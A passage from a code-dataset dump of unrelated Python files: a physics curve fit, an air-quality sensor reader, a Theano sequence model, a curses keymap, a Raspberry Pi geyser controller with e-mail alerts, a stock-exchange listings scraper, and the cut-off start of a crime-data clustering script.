r'\\usepackage{unicode-math}\\usepackage{siunitx}'\n})\n\nU6, I6 = np.genfromtxt('messwerte4.txt', unpack=True)\nI6A = I6/1000000000\nU6tat = U6 - 1000000*I6A #1MOhm Innenwiderstand\nI6log = np.log(I6A)\n\ne = const.e\nk = const.k\n\ndef f(x, a, b):\n return a*x+b\n\nparams, covariance = curve_fit(f, U6tat, I6log)\n\nerrors = np.sqrt(np.diag(covariance))\n\nprint('a =', params[0], '±', errors[0])\nprint('b =', params[1], '±', errors[1])\n\na = ufloat(params[0], errors[0])\n\nT = -e/(k*a)\n\nnp.savetxt(\"Parameter2.txt\", np.column_stack([params, errors]))\n\nprint('T =', noms(T), '±', stds(T))#in Kelvin\n\nx_plot = np.linspace(-0.05, 1)\n\nplt.plot(x_plot, f(x_plot, *params), 'b-', label='Fit', linewidth=1)\nplt.plot(U6tat, I6log, 'rx', label='Messwerte', linewidth=1)\nplt.xlabel(r'$ln \\left( \\frac{U}{\\si{\\volt}} \\right)$')\nplt.ylabel(r'$ln \\left( \\frac{I}{\\si{\\nano\\ampere}} \\right)$')\nplt.xlim(-0.05, 1)\nplt.grid()\nplt.legend(loc=\"best\")\nplt.tight_layout()\nplt.savefig(\"Plot3.pdf\")\n","sub_path":"V504_Thermische Elektronenemission/auswertung3.py","file_name":"auswertung3.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273820143","text":"import os\nimport time\n\nimport serial\n\n#physicalPort = 'COM4'\nphysicalPort = \"/dev/ttyUSB0\"\n\nserialPort = serial.Serial(physicalPort) # open serial port\n\nwhile True:\n # Check if we have enough data to read a payload\n if serialPort.in_waiting >= 32:\n # Check that we are reading the payload from the correct place (i.e. the start bits)\n if ord(serialPort.read()) == 0x42 and ord(serialPort.read()) == 0x4d:\n\n # Read the remaining payload data\n data = serialPort.read(30)\n\n # Extract the byte data by summing the bit shifted high byte with the low byte\n # Use ordinals in python to get the byte value rather than the char value\n frameLength = data[1] + (data[0] << 8)\n # Standard particulate values in ug/m3\n concPM1_0_CF1 = data[3] + (data[2] << 8)\n concPM2_5_CF1 = data[5] + (data[4] << 8)\n concPM10_0_CF1 = data[7] + (data[6] << 8)\n # Atmospheric particulate values in ug/m3\n concPM1_0_ATM = data[9] + (data[8] << 8)\n concPM2_5_ATM = data[11] + (data[10] << 8)\n concPM10_0_ATM = data[13] + (data[12] << 8)\n # Raw counts per 0.1l\n rawGt0_3um = data[15] + (data[14] << 8)\n rawGt0_5um = data[17] + (data[16] << 8)\n rawGt1_0um = data[19] + (data[18] << 8)\n rawGt2_5um = data[21] + (data[20] << 8)\n rawGt5_0um = data[23] + (data[22] << 8)\n rawGt10_0um = data[25] + (data[24] << 8)\n # Misc data\n version = data[26]\n errorCode = data[27]\n payloadChecksum = data[29] + (data[28] << 8)\n\n # Calculate the payload checksum (not including the payload checksum bytes)\n inputChecksum = 0x42 + 0x4d\n for x in range(0, 27):\n inputChecksum = inputChecksum + data[x]\n\n # Clear the screen before displaying the next set of data\n os.system('cls') # Set to 'cls' on Windows, 'clear' on linux\n print(\"PMS7003 Sensor Data:\")\n print(\"PM1.0 = \" + str(concPM1_0_CF1) + \" ug/m3\")\n print(\"PM2.5 = \" + str(concPM2_5_CF1) + \" ug/m3\")\n print(\"PM10 = \" + str(concPM10_0_CF1) + \" ug/m3\")\n print(\"PM1 Atmospheric concentration = \" + str(concPM1_0_ATM) + \" ug/m3\")\n print(\"PM2.5 Atmospheric concentration = \" + str(concPM2_5_ATM) + \" ug/m3\")\n print(\"PM10 Atmospheric concentration = \" + str(concPM10_0_ATM) + \" ug/m3\")\n print(\"Count: 0.3um = \" + str(rawGt0_3um) + \" per 0.1l\")\n print(\"Count: 0.5um = \" + str(rawGt0_5um) + 
\" per 0.1l\")\n print(\"Count: 1.0um = \" + str(rawGt1_0um) + \" per 0.1l\")\n print(\"Count: 2.5um = \" + str(rawGt2_5um) + \" per 0.1l\")\n print(\"Count: 5.0um = \" + str(rawGt5_0um) + \" per 0.1l\")\n print(\"Count: 10um = \" + str(rawGt10_0um) + \" per 0.1l\")\n print(\"Version = \" + str(version))\n print(\"Error Code = \" + str(errorCode))\n print(\"Frame length = \" + str(frameLength))\n if inputChecksum != payloadChecksum:\n print(\"Warning! Checksums don't match!\")\n print(\"Calculated Checksum = \" + str(inputChecksum))\n print(\"Payload checksum = \" + str(payloadChecksum))\n time.sleep(0.7) # Maximum recommended delay (as per data sheet)","sub_path":"dSensor.py","file_name":"dSensor.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346544710","text":"# -*- coding: utf-8 -*-\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport cPickle\nimport logging\nimport collections\nlogger = logging.getLogger(__name__)\n\nfrom theano import scan\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams\nfrom theano.tensor.nnet.conv3d2d import *\nfrom collections import OrderedDict\n\nfrom model import *\nfrom utils import *\n\nimport operator\n\n# Theano speed-up\ntheano.config.scan.allow_gc = False\n#\n\ndef add_to_params(params, new_param):\n params.append(new_param)\n return new_param\n \nclass TitleModel(Model):\n def __init__(self, state, test_mode=False):\n Model.__init__(self)\n self.rng = numpy.random.RandomState(state['seed'])\n self.state = state\n self.__dict__.update(state)\n self.test_mode = test_mode\n self.name = 'TitleModel'\n self.active = eval(self.active)\n self.params = []\n self.init_params()\n\n self.x_data = T.imatrix('x_data')\n self.abs_in = T.imatrix('abs_in')\n self.abs_out = T.imatrix('abs_out')\n\n self.xmask = T.matrix('x_mask')\n self.ymask = T.matrix('y_mask')\n\n self.h_enc_basic = self.encode(self.x_data, self.xmask)\n self.h_enc_emb = self.approx_embedder(self.x_data)\n self.h_enc = T.concatenate([self.h_enc_basic, self.h_enc_emb], axis=2)\n [self.pt, self.ot, self.h_t, self.alpha] = self.decode()\n \n self.cost = self.build_cost(self.pt,\n self.abs_out,\n self.ymask)\n self.updates = self.compute_updates(self.cost, self.params)\n\n self.gen_h = theano.shared(value=np.zeros((2, self.h_dim), dtype='float32'), name='gen_h')\n self.gen_x = T.ivector('gen_x')\n [self.gen_pred, self.gen_ot, self.gen_alpha, self.gen_updates] = self.build_gen()\n \n def init_params(self):\n self.W_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.word_dim, self.emb_dim), name='W_emb'+self.name))\n self.H_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_enc'+self.name))\n self.P_enc = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_enc'+self.name))\n self.H_dec = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='H_dec'+self.name))\n self.P_dec = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.emb_dim, self.h_dim), name='P_dec'+self.name))\n self.W = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='W_dec'+self.name))\n self.U = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='U_dec'+self.name))\n self.O_h = add_to_params(self.params, 
        self.O_h = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.h_dim), name='O_h_dec'+self.name))\n        self.O_z = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, (self.h_dim + self.emb_dim), self.h_dim), name='O_z_dec'+self.name))\n        self.out_emb = add_to_params(self.params, theano.shared(value=NormalInit(self.rng, self.h_dim, self.word_dim), name='out_emb'+self.name))\n        self.b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='b'+self.name))\n        self.b = self.b.dimshuffle('x', 'x', 0)\n        self.encode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='encode_b'+self.name))\n        self.decode_b = add_to_params(self.params, theano.shared(value=np.zeros((self.h_dim,), dtype='float32'), name='decode_b'+self.name))\n\n    def approx_embedder(self, x):\n        return self.W_emb[x]\n\n    def encode(self, x_data, mask):\n        if self.test_mode:\n            batch_size = 2\n        else:\n            batch_size = self.bs\n        emb_x = self.approx_embedder(x_data)\n        def encode_step(x_t, h_tm1):\n            h_t = self.active(T.dot(h_tm1, self.H_enc) + \\\n                              T.dot(x_t, self.P_enc) + \\\n                              self.encode_b)\n            return h_t\n        h_0 = T.alloc(np.float32(0), batch_size, self.h_dim)\n        h_enc, _ = theano.scan(encode_step, \\\n                               sequences=[emb_x], \\\n                               outputs_info=[h_0])\n        return h_enc\n\n    def decode_step(self, abs_in_t, h_tm1, h_enc, xmask, b):\n        x_t = self.approx_embedder(abs_in_t)\n        h_t = self.active(T.dot(h_tm1, self.H_dec) + \\\n                          T.dot(x_t, self.P_dec) + \\\n                          self.decode_b)\n        tmp = T.dot(h_tm1, self.W).dimshuffle('x', 0, 1) + \\\n              T.dot(h_enc, self.U)\n        beta_t = T.sum(b * tmp, axis=2)\n        alpha_t = T.exp(beta_t) * xmask / T.sum(T.exp(beta_t) * xmask, axis=0)\n        z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n        z_t = T.sum(z_tmp, axis=0)\n        g_t = T.dot(T.dot(h_t, self.O_h) + T.dot(z_t, self.O_z), \\\n                    self.out_emb)\n        p_t = SoftMax(g_t)\n        o_t = p_t.argmax(axis=1)\n        return [p_t, o_t, h_t, alpha_t]\n\n    def build_gen(self):\n        x_t = self.approx_embedder(self.gen_x)\n        h_tm1 = self.gen_h\n        h_enc = self.h_enc\n        xmask = self.xmask\n        b = self.b\n        h_t = self.active(T.dot(h_tm1, self.H_dec) + \\\n                          T.dot(x_t, self.P_dec) + \\\n                          self.decode_b)\n        tmp = T.dot(h_tm1, self.W).dimshuffle('x', 0, 1) + \\\n              T.dot(h_enc, self.U)\n        beta_t = T.sum(b * tmp, axis=2)\n        beta_t2 = beta_t - T.max(beta_t)\n        alpha_t = T.exp(beta_t2) * xmask / T.sum(T.exp(beta_t2) * xmask, axis=0)\n        z_tmp = h_enc * (alpha_t).dimshuffle(0, 1, 'x')\n        z_t = T.sum(z_tmp, axis=0)\n        g_t = T.dot(T.dot(h_t, self.O_h) + T.dot(z_t, self.O_z), \\\n                    self.out_emb)\n        p_t = SoftMax(g_t)\n        o_t = p_t.argmax(axis=1)\n        updates = [(self.gen_h, h_t)]\n        return [p_t, o_t, alpha_t, updates]\n\n    def gen_reset(self):\n        self.gen_h.set_value(np.zeros((2, self.h_dim), dtype='float32'))\n\n    def gen_next(self, abs_in, h_enc, xmask, b):\n        abs_in_emb = self.approx_embedder([abs_in, 0])\n        gen_fn = self.build_gen_function()\n        p_t = gen_fn(self.x_data, self.xmask, self.gen_x)\n        return p_t\n\n    def decode(self):\n        batch_size = self.bs\n        h_enc = self.h_enc\n        xmask = self.xmask\n\n        h_0 = theano.shared(np.zeros((batch_size, self.h_dim), \\\n                                     dtype='float32'), \\\n                            name='decode_h0')\n\n        [p_t, o_t, h_t, alpha], _ = theano.scan(self.decode_step, \\\n                                                outputs_info=[None, None, h_0, None], \\\n                                                non_sequences=[h_enc, xmask, self.b], \\\n                                                sequences=[self.abs_in])\n        return [p_t, o_t, h_t, alpha]\n\n    def build_cost(self, ot, abs_out, ymask):\n        x_flatten = ot.dimshuffle(2,0,1)\n        x_flatten = x_flatten.flatten(2).dimshuffle(1, 0)\n        y_flatten = abs_out.flatten()\n
x_flatten[T.arange(y_flatten.shape[0]), \\\n y_flatten]\n neg_log_cost_sum = T.sum(-T.log(cost) * ymask.flatten())\n cost_res = neg_log_cost_sum\n\n self.pred = x_flatten.argmax(axis=1)\n self.acc = 1.0 * T.sum(T.eq(self.pred, y_flatten) * ymask.flatten()) / T.sum(ymask)\n return cost_res\n\n def build_train_function(self):\n if not hasattr(self, 'train_fn'):\n self.train_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.abs_in,\n self.abs_out,\n self.ymask],\n outputs=[self.cost, \\\n self.acc],\n updates=self.updates,\n name=\"train_fn\")\n return self.train_fn\n\n def build_eval_function(self):\n if not hasattr(self, 'eval_fn'):\n self.eval_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.abs_in,\n self.abs_out,\n self.ymask],\n outputs=[self.cost, \\\n self.acc],\n name=\"eval_fn\")\n return self.eval_fn\n\n def build_gen_function(self):\n if not hasattr(self, 'gen_fn'):\n self.gen_fn = \\\n theano.function(inputs=[self.x_data,\n self.xmask,\n self.gen_x],\n outputs=[self.gen_pred, self.gen_ot, self.gen_alpha],\n updates=self.gen_updates,\n name=\"gen_fn\")\n return self.gen_fn\n\n def compute_updates(self, training_cost, params):\n updates = []\n \n grads = T.grad(training_cost, params)\n grads = OrderedDict(zip(params, grads))\n\n # Clip stuff\n c = numpy.float32(self.cutoff)\n clip_grads = []\n \n norm_gs = T.sqrt(sum(T.sum(g ** 2) for p, g in grads.items()))\n normalization = T.switch(T.ge(norm_gs, c), c / norm_gs, np.float32(1.))\n notfinite = T.or_(T.isnan(norm_gs), T.isinf(norm_gs))\n \n for p, g in grads.items():\n clip_grads.append((p, T.switch(notfinite, numpy.float32(.1) * p, g * normalization)))\n \n grads = OrderedDict(clip_grads)\n\n if self.updater == 'adagrad':\n updates = Adagrad(grads, self.lr) \n elif self.updater == 'sgd':\n raise Exception(\"Sgd not implemented!\")\n elif self.updater == 'adadelta':\n updates = Adadelta(grads)\n elif self.updater == 'rmsprop':\n updates = RMSProp(grads, self.lr)\n elif self.updater == 'adam':\n updates = Adam(grads)\n else:\n raise Exception(\"Updater not understood!\") \n\n return updates\n","sub_path":"attention_NLU/title_model32.py","file_name":"title_model32.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616465610","text":"import curses\n\ndef get_mapped_action(key, active_window):\n \"\"\"\n Specifies what should happen when a certain key is pressed. 
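Returns the matching navigation handler bound to active_window\n    (select_up/select_down/select_left/select_right), or None for 'q' and any\n    unmapped key. A minimal caller sketch (hypothetical loop, assuming a curses\n    screen object named screen):\n\n        action = get_mapped_action(screen.getch(), active_window)\n        if action is not None:\n            action()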
\n \"\"\"\n\n if key == ord('k') or key == curses.KEY_UP:\n return active_window.select_up\n\n elif key == ord('j') or key == curses.KEY_DOWN:\n return active_window.select_down\n\n elif key == ord('l') or key == curses.KEY_RIGHT:\n return active_window.select_right\n\n elif key == ord('h') or key == curses.KEY_LEFT:\n return active_window.select_left\n\n elif key == ord('q'):\n return None\n\n else:\n print(key)\n return None\n","sub_path":"src/taskwarrior_kanban/gui/keymap.py","file_name":"keymap.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42661779","text":"#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nimport time\nimport mysql.connector\nimport subprocess\nimport sys\nimport os\nimport glob\nimport smtplib\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(26,GPIO.OUT)\nGPIO.setup(20,GPIO.OUT)\nGPIO.setup(21,GPIO.OUT)\n\nGPIO.output(26,GPIO.HIGH)\nGPIO.output(20,GPIO.HIGH)\nGPIO.output(21,GPIO.HIGH)\n\ndbHost = 'localhost'\ndbUsername = 'pi'\ndbPassword = 'raspberry'\ndbDatabase = 'geyser_pi'\n\n\n# GLOBAL VARS\nmaxGeyserTemp = 0\nminGeyserTemp = 0\ncurrentGeyserTemp = 0\nmaxReservoirTemp = 0\nminReservoirTemp = 0\ncurrentReservoirTemp = 0\nelementIsAuto = 0\nelementIsOn = 0\npumpIsAuto = 0\npumpIsOn = 0\nholidayIsOn = 0\nscheduledTemp = 0\ndeltaTemp = 7\nautoTimeout = 0\n\n# GLOBAL COUNTERS\nsmtpSleepCounter = 300 # 5 MINUTES\nelementBackToAuto = 0\npumpBackToAuto = 0\n\n\n# RETURN A DB CONNECTION\ndef dbConnect():\n return mysql.connector.connect(\n user = dbUsername,\n password = dbPassword,\n host = dbHost,\n database = dbDatabase)\n\n\n# SWITCH THE ELEMENT ON, BUT DO NOT UPDATE THE DB\ndef elementOn():\n global holidayIsOn\n global elementIsOn\n if not holidayIsOn and geyserIsCold():\n GPIO.output(26,GPIO.LOW) \n elementIsOn = 1\n return\n\n# SWITCH THE ELEMENT ON, AND UPDATE THE DB\ndef turnElementOn():\n if not elementIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setElementOn()')\n conn.commit()\n conn.close()\n elementOn()\n return\n\n# SWITCH THE ELEMENT OFF, BUT DO NOT UPDATE THE DB\ndef elementOff():\n GPIO.output(26,GPIO.HIGH)\n global elementIsOn\n elementIsOn = 0\n return\n\n# SWITCH THE ELEMENT OFF, AND UPDATE THE DB\ndef turnElementOff():\n if elementIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setElementOff()')\n conn.commit()\n conn.close()\n elementOff()\n return\n\n# SWITCH THE PUMP ON, BUT DO NOT UPDATE THE DB\ndef pumpOn():\n GPIO.output(20,GPIO.LOW)\n global pumpIsOn\n pumpIsOn = 1\n return\n\n# SWITCH THE PUMP ON, AND UPDATE THE DB\ndef turnPumpOn():\n if not pumpIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setPumpOn()')\n conn.commit()\n conn.close() \n pumpOn()\n return\n\n# SWITCH THE PUMP OFF, BUT DO NOT UPDATE THE DB\ndef pumpOff():\n GPIO.output(20,GPIO.HIGH)\n global pumpIsOn\n pumpIsOn = 0\n return\n\n#SWITCH THE PUMP OFF, AND UPDATE THE DB\ndef turnPumpOff():\n if pumpIsOn:\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('CALL setPumpOff()')\n conn.commit()\n conn.close() \n pumpOff()\n return\n\n# CHECK IF THE GEYSER TEMP IS LOWER THAN THE THRESHOLDS\n# ADDED 2 DEGREES UPWARDS VARIATION FOR SCHMIDT-TRIGGER\ndef geyserIsCold():\n global currentGeyserTemp\n global maxGeyserTemp\n return (((currentGeyserTemp + 2) < getScheduledTemp()) and (currentGeyserTemp < maxGeyserTemp))\n\n# CHECK IF THE GEYSER TEMP IS ABOVE THE MAXIMUM\ndef geyserIsTooHot():\n 
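# Reads module-level values refreshed each loop by getProbeValues() and\n    # getSystemStatus(); a True result drives the overheat e-mail alert.\n    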
global currentGeyserTemp\n global maxGeyserTemp\n return currentGeyserTemp > maxGeyserTemp\n\n# CHECK IF THE GEYSER TEMP IS BELOW THE MINIMUM\ndef geyserIsTooCold():\n global currentGeyserTemp\n global minGeyserTemp\n return currentGeyserTemp < minGeyserTemp \n\n# IS THE RESERVOIR TEMP LOWER THAN THE GEYSER TEMP\ndef reservoirIsCold():\n global currentReservoirTemp\n global currentGeyserTemp\n global deltaTemp\n return (currentReservoirTemp < (currentGeyserTemp + deltaTemp))\n\n# IS THE RESERVOIR TEMP HIGHER THAN THE GEYSER TEMP\ndef reservoirIsHot():\n return not reservoirIsCold()\n\n# IS THE GEYSER TEMP LOWER THAN THE THRESHOLDS AND THE RESERVOIR TEMP IS LOWER THAN THE GEYSER TEMP\ndef canTurnElementOn():\n return (geyserIsCold() and reservoirIsCold())\n\n# IS THE RESERVOIR TEMP HIGHER THAN THE GEYSER TEMP, AND THE GEYSER TEMP LOWER THAN THE THRESHOLDS\ndef canTurnPumpOn():\n return reservoirIsHot() and geyserIsCold() \n\ndef setControls():\n\n global maxGeyserTemp\n global minGeyserTemp\n global maxReservoirTemp\n global minReservoirTemp\n global elementIsAuto\n global elementIsOn\n global pumpIsAuto\n global pumpIsOn\n global holidayIsOn\n global sheduledTemp\n global deltaTemp\n global autoTimeout\n global elementBackToAuto\n global pumpBackToAuto\n\n\n if holidayIsOn:\n turnElementOff()\n else:\n if elementIsAuto:\n if canTurnElementOn():\n turnElementOn()\n else:\n turnElementOff()\n elementBackToAuto = 0\n else:\n if elementIsOn:\n elementOn()\n else:\n elementOff()\n \n if elementBackToAuto > (autoTimeout * 60):\n elementIsAuto = 1\n elementBackToAuto = 0\n updateSystemStatus()\n else:\n elementBackToAuto = elementBackToAuto + 1\n\n if pumpIsAuto:\n if canTurnPumpOn():\n turnPumpOn()\n else:\n turnPumpOff()\n pumpBackToAuto = 0\n else:\n if pumpIsOn:\n pumpOn()\n else:\n pumpOff()\n \n if pumpBackToAuto > (autoTimeout * 60):\n pumpIsAuto = 1\n pumpBackToAuto = 0\n updateSystemStatus()\n else:\n pumpBackToAuto = pumpBackToAuto + 1\n return\n\ndef getProbeValues():\n global currentGeyserTemp\n global currentReservoirTemp\n geyserTemp = subprocess.check_output([sys.executable, \"/home/pi/GeyserPi/Python/getGeyserTemp.py\", \"34\"])\n reservoirTemp = subprocess.check_output([sys.executable, \"/home/pi/GeyserPi/Python/getReservoirTemp.py\", \"34\"])\n currentGeyserTemp = float(geyserTemp)\n currentReservoirTemp = float(reservoirTemp)\n return\n\ndef getScheduledTemp():\n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('select temperature from temperature_schedule where `day` = dayofweek(now()) and `hour` = hour(now())') \n conf = cur.fetchone() \n conn.close()\n return conf[0]\n\n\ndef getSystemStatus():\n \n conn = dbConnect() \n cur = conn.cursor() \n cur.execute('select element_auto, element_on, pump_auto, pump_on, holiday_on, geyser_max_temp, reservoir_min_temp, delta_temp, auto_timeout, geyser_min_temp from system_config') \n conf = cur.fetchone() \n conn.close()\n \n global maxGeyserTemp\n global minGeyserTemp\n global maxReservoirTemp\n global minReservoirTemp\n global elementIsAuto\n global elementIsOn\n global pumpIsAuto\n global pumpIsOn\n global holidayIsOn\n global deltaTemp\n global autoTimeout\n \n maxGeyserTemp = conf[5]\n minGeyserTemp = conf[9]\n maxReservoirTemp = 0\n minReservoirTemp = conf[6]\n elementIsAuto = conf[0]\n elementIsOn = conf[1]\n pumpIsAuto = conf[2]\n pumpIsOn = conf[3]\n holidayIsOn = conf[4]\n deltaTemp = conf[7]\n autoTimeout = conf[8]\n \n return\n\ndef updateSystemStatus():\n global elementIsOn\n global pumpIsOn\n global elementIsAuto\n 
global pumpIsAuto\n    conn = dbConnect() \n    cur = conn.cursor() \n    cur.execute('update system_config set element_on = ' + str(elementIsOn) + ', pump_on = ' + str(pumpIsOn) + ', element_auto = ' + str(elementIsAuto) + ', pump_auto = ' + str(pumpIsAuto) + ' where id = 0')\n    conn.commit()\n    conn.close()\n\ndef sendEmail(message):\n    conn = dbConnect() \n    cur = conn.cursor() \n    cur.execute('select smtp_host, smtp_port, smtp_username, smtp_password, smtp_from_email, smtp_from_name, smtp_recipient_email from system_config') \n    conf = cur.fetchone() \n    conn.close()\n\n    smtpHost = conf[0]\n    smtpPort = conf[1]\n    smtpUsername = conf[2]\n    smtpPassword = conf[3]\n    smtpFromEmail = conf[4]\n    smtpFromName = conf[5]\n    smtpRecipientEmail = conf[6]\n\n    # str() guards against the port column coming back from MySQL as an integer\n    smtp = smtplib.SMTP(smtpHost + ':' + str(smtpPort))\n    smtp.starttls()\n    smtp.login(smtpUsername,smtpPassword)\n    try:\n        smtp.sendmail(smtpFromEmail, smtpRecipientEmail, message)\n    except:\n        print('SMTP Error')\n    smtp.quit()\n\n# SEND EMAIL NOTIFICATIONS, ONLY EVERY 5 MINUTES\ndef sendEmailNotifications():\n    global smtpSleepCounter\n\n    # WHEN THE GEYSER IS ABOVE THE MAXIMUM\n    if geyserIsTooHot():\n        if smtpSleepCounter >= 300:\n            sendEmail('The geyser has overheated')\n            print('hot', smtpSleepCounter)\n        smtpSleepCounter = smtpSleepCounter + 1\n    \n    # WHEN THE GEYSER IS BELOW THE MINIMUM\n    if geyserIsTooCold():\n        print('cold')\n        if smtpSleepCounter >= 300:\n            sendEmail('The geyser is too cold')\n            print('cold', smtpSleepCounter)\n        smtpSleepCounter = smtpSleepCounter + 1\n\n    if smtpSleepCounter > 300:\n        smtpSleepCounter = 0\n\n# INITIALLY WAIT 10 SECONDS AFTER STARTUP FOR CONNECTION TO ESTABLISH ETC.\ntime.sleep(10)\n\n# SEND A NOTIFICATION WHEN THE SYSTEM STARTS\nsendEmail('GeyserPi Started')\n\nwhile True:\n    getProbeValues()\n    getSystemStatus()\n    setControls()\n    sendEmailNotifications()\n    time.sleep(1)  # the back-to-auto and SMTP counters assume one tick per second\n\n","sub_path":"Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"252868210","text":"import pickle\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport csv\n\ndriver = webdriver.Chrome()\n\ninitial_url = 'https://www.bseindia.com/corporates/List_Scrips.aspx'\ndriver.get(initial_url)\ntime.sleep(4)\n\nsegment = '//*[@id=\"ContentPlaceHolder1_ddSegment\"]'\ndriver.find_element_by_xpath(segment).send_keys('Equity')\n\nstatus = '//*[@id=\"ContentPlaceHolder1_ddlStatus\"]'\ndriver.find_element_by_xpath(status).send_keys('Active')\n\n\nclick_button = '//*[@id= \"ContentPlaceHolder1_btnSubmit\"]'\ndriver.find_element_by_xpath(click_button).click()\n\n\ndef process_html(html_content):\n    code = []\n    name = []\n    soup = BeautifulSoup(html_content, 'html.parser')\n    table = soup.find('table', id=\"ContentPlaceHolder1_gvData\")\n    # class = \"TTRow_left\"\n    for link in table.find_all('tr'):\n        i = 0\n        security_code = 0\n        security_name = ''\n        for ele in link.find_all('td', {\"class\": \"TTRow_left\"}):\n            i += 1\n            if(i == 1):\n                security_code = ele.text\n            if(i == 3):\n                security_name = ele.text\n                break\n        if(security_code != 0 and security_name != ''):\n            code.append(security_code)\n            name.append(security_name)\n    return code, name\n\n\nsecurity_code_details = []\nsecurity_name_details = []\nfor i in range(17):\n    # Write logic to extract first page details\n    # Extract first page logic here\n    if(i == 16):\n        code, name = process_html(driver.page_source)\n        security_code_details.extend(code)\n        
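# codes and names are appended in lockstep so they can be zipped into\n        # dict_companies by index at the end of the script\n        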
security_name_details.extend(name)\n for k in range(9, 13):\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n k)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n # Extract logic here\n time.sleep(2)\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"---------------------------------------------\")\n else:\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"--------------------------------------------------------\")\n for j in range(2, 14):\n if(i == 0 and j == 11):\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n j)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n time.sleep(2)\n print(\"hello\")\n break\n elif(i != 0 and j in [2, 3]):\n continue\n else:\n page_xpath = '//*[@id=\"ContentPlaceHolder1_gvData\"]/tbody/tr[1]/td/table/tbody/tr/td['+str(\n j)+']/a'\n driver.find_element_by_xpath(page_xpath).click()\n # Extract logic here\n time.sleep(2)\n code, name = process_html(driver.page_source)\n security_code_details.extend(code)\n security_name_details.extend(name)\n print(len(security_code_details))\n print(len(security_name_details))\n print(\"---------------------------------------------\")\n\ndict_companies = {}\nfor i in range(len(security_code_details)):\n dict_companies[security_code_details[i]] = security_name_details[i]\n\nfor i in dict_companies:\n print(i, dict_companies[i])\n\nwith open('companies.pickle', 'wb') as handle:\n pickle.dump(dict_companies, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('companies_data.csv', 'w') as f:\n for key in dict_companies.keys():\n f.write(\"%s, %s\\n\" % (key, dict_companies[key]))\n","sub_path":"DADV/BSE/scrap_company_details.py","file_name":"scrap_company_details.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85654626","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 2 14:12:03 2018\r\n\r\n@author: Riven\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import decomposition\r\nfrom sklearn import datasets\r\nfrom sklearn.cluster import KMeans,DBSCAN,\tAgglomerativeClustering\r\nfrom sklearn import preprocessing\r\nimport pylab as pl\r\nfrom sklearn import decomposition\r\nfrom pprint import pprint\r\nfrom sklearn.metrics import calinski_harabaz_score\r\nimport argparse\r\n\r\n\r\nfilepath = './dataset/crime2017_preprocessed.csv'\r\n\r\n\r\ndef getArguments():\r\n # get and parse command line arguments\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n '-f', type=str, default=filepath, help='the file path')\r\n return parser.parse_args()\r\n\r\n\r\n\r\n\r\ndef NormalizeData():\r\n fixData=pd.concat([myData['CCN'], myData['SHIFT'], myData['METHOD'], myData['OFFENSE'], myData['XBLOCK'], myData['YBLOCK'],myData['WARD'],myData['DISTRICT'],myData['NEIGHBORHOOD_CLUSTER'],myData['CENSUS_TRACT'],myData['VOTING_PRECINCT'],myData['LATITUDE'],myData['LONGITUDE'],myData['PSA_bin']], \r\n axis=1, keys=['CCN', 'SHIFT', 'METHOD', 'OFFENSE', 
